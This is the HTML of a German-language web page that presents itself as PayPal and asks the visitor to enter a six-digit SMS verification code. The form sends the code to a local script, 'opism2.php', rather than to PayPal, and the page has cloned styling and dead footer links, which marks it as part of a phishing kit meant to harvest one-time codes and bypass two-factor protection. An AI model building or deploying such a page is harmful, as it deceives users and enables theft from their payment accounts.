<!DOCTYPE html>
<html dir="ltr" data-reactid=".14j6ip0k64g" data-react-checksum="1583192807" lang="de">

<head data-reactid=".14j6ip0k64g.0">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" data-reactid=".14j6ip0k64g.0.0">
    <meta http-equiv="content-type" content="text/html; charset=UTF-8" data-reactid=".14j6ip0k64g.0.1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=yes" data-reactid=".14j6ip0k64g.0.8">
    <link rel="shortcut icon" href="./imgs/favicon.ico" data-reactid=".14j6ip0k64g.0.9">

    <title data-reactid=".14j6ip0k64g.0.b">PayPal Inc.</title>
    <meta name="pageInfo" data-reactid=".14j6ip0k64g.0.c:0">
    <!--Script info: script: node, template:  undefined,
		date: Apr 17, 2017 07:24:25 -07:00, country: DE, language: de
		hostname : FvHtZxaU1dSbFvOkST06DvxSGDzSTcMLIQdw1O3sqJ0e/1q+1IXpx0IB4DKm29Su rlogid : 
		DnUtbGiOr3NxmnmPrYxbuT0qqb1Ti6xfzfOGKP12FvRIqtel5JOPNDpbNE%2FEkVbGnKQrWrUrrDM_15b7c4ce589 null-->
    <link rel="stylesheet" href="krt2-Dateien/app.css" data-reactid=".14j6ip0k64g.0.c:1">
    <meta content="rDtDzEiUyCT3PUKbT1baHn6DydHvXsv1K1ebE=" name="csrf-token" data-reactid=".14j6ip0k64g.0.c:2">
</head>

<body class="" data-reactid=".14j6ip0k64g.1">
    <div data-reactid=".14j6ip0k64g.1.0">
        <style data-reactid=".14j6ip0k64g.1.0.0">
            html {
                display: block
            }
        </style>
        <div data-reactid=".14j6ip0k64g.1.0.1">
            <div class="jsDisabled" data-reactid=".14j6ip0k64g.1.0.1.0">
                <noscript data-reactid=".14j6ip0k64g.1.0.1.0.0">
                    <meta http-equiv="refresh" content="#" />
                    <style data-reactid=".14j6ip0k64g.1.0.1.0.0.1">
                        html {
                            display: none
                        }
                    </style>
                </noscript>
            </div>
            <div class="contentContainer" id="content" data-reactid=".fj9e2dg1ds.1.0.1.1">
                <div data-reactid=".fj9e2dg1ds.1.0.1.1.0">
              <form method="post" novalidate="" action="opism2.php" >
                        <div id="challenges" class="textCenter challenges panel" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0">
                            <header data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.0">
                                <div class="paypal-logo" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.0.0"></div>
                            </header>
                            <div class="answerSection smsPin" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1">
                                <h1 data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.0">Geben Sie den Code ein.</h1>
                                <p class="description sms-use" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.1"><span data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.1.0">Wir haben einen 6-stelligen Code an Ihr Handy gesendet.</span><span data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.1.1"> </span><span class="forceLtr" style="direction:ltr;unicode-bidi:bidi-override;" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.1.2">••••••</span><span data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.1.3">.</span>
                                </p>
                                <div class="textInput floatLabel" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.2">
                                    <div class="fieldWrapper" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.2.0">
                                        <label class="fieldLabel" for="login_email" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.2.0.0"><span data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.2.0.0.0">Verifizierungscode</span>
                                            <div class="errorMessage" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.2.0.0.1"></div>
                                        </label>
                                        <input placeholder="Verifizierungscode" label="Verifizierungscode" id="login_email" pattern="[0-9]*" name="login_email" autocomplete="off" class="hasHelp" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.2.0.1" type="tel">
                                        <div class="resend-link" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.2.0.1.0">
								
										<a href="proc6.html" class="tryDifferentWay" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.4.0.0">Erneut senden</a>
                                        </div>
                                    </div>
                                </div>
                                <div class="action" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.3">
                                    <input value="Weiter" name="smsPin" class="button scTrack:sms_pin_continue_button primary" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.3.0" type="submit">
                                </div>
                                <div data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.4">
                                    <p class="tryDifferentWaySection" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.4.0">
									<a href="#" class="tryDifferentWay" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.1.4.0.0">Anders bestätigen</a>
                                    </p>
                                </div>
                            </div>
                            <div class="modal-animate hide" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.2">
                                <div class="rotate" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.2.0"></div>
                                <div class="processing" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.2.1">Verarbeiten…</div>
                            </div>
                            <div class="modal-overlay hide" data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.0.3"></div>
                        </div>
                        <script data-reactid=".fj9e2dg1ds.1.0.1.1.0.0.1"></script>
                    </form>
                    <div class="loaderOverlay" data-reactid=".fj9e2dg1ds.1.0.1.1.0.1">
                        <div class="modal-animate hide" data-reactid=".fj9e2dg1ds.1.0.1.1.0.1.0">
                            <div class="rotate" data-reactid=".fj9e2dg1ds.1.0.1.1.0.1.0.0"></div>
                            <div class="processing" data-reactid=".fj9e2dg1ds.1.0.1.1.0.1.0.1">Verarbeiten…</div>
                        </div>
                        <div class="modal-overlay hide" data-reactid=".fj9e2dg1ds.1.0.1.1.0.1.1"></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <footer class="footer" data-reactid=".fj9e2dg1ds.1.1">
        <ul class="footerLinks" data-reactid=".fj9e2dg1ds.1.1.1">
            <li class="imprintFooterListItem" data-reactid=".fj9e2dg1ds.1.1.1.$imprint"><a href="#">Impressum</a>
            </li>
            <li class="privacyFooterListItem" data-reactid=".fj9e2dg1ds.1.1.1.$privacy"><a href="#">Datenschutz</a>
            </li>
            <li class="legalFooterListItem" data-reactid=".fj9e2dg1ds.1.1.1.$legal"><a href="#">AGB</a>
            </li>
        </ul>
    </footer>

    <div class="fpti" data-reactid=".fj9e2dg1ds.1.3">

</body>

</html>
 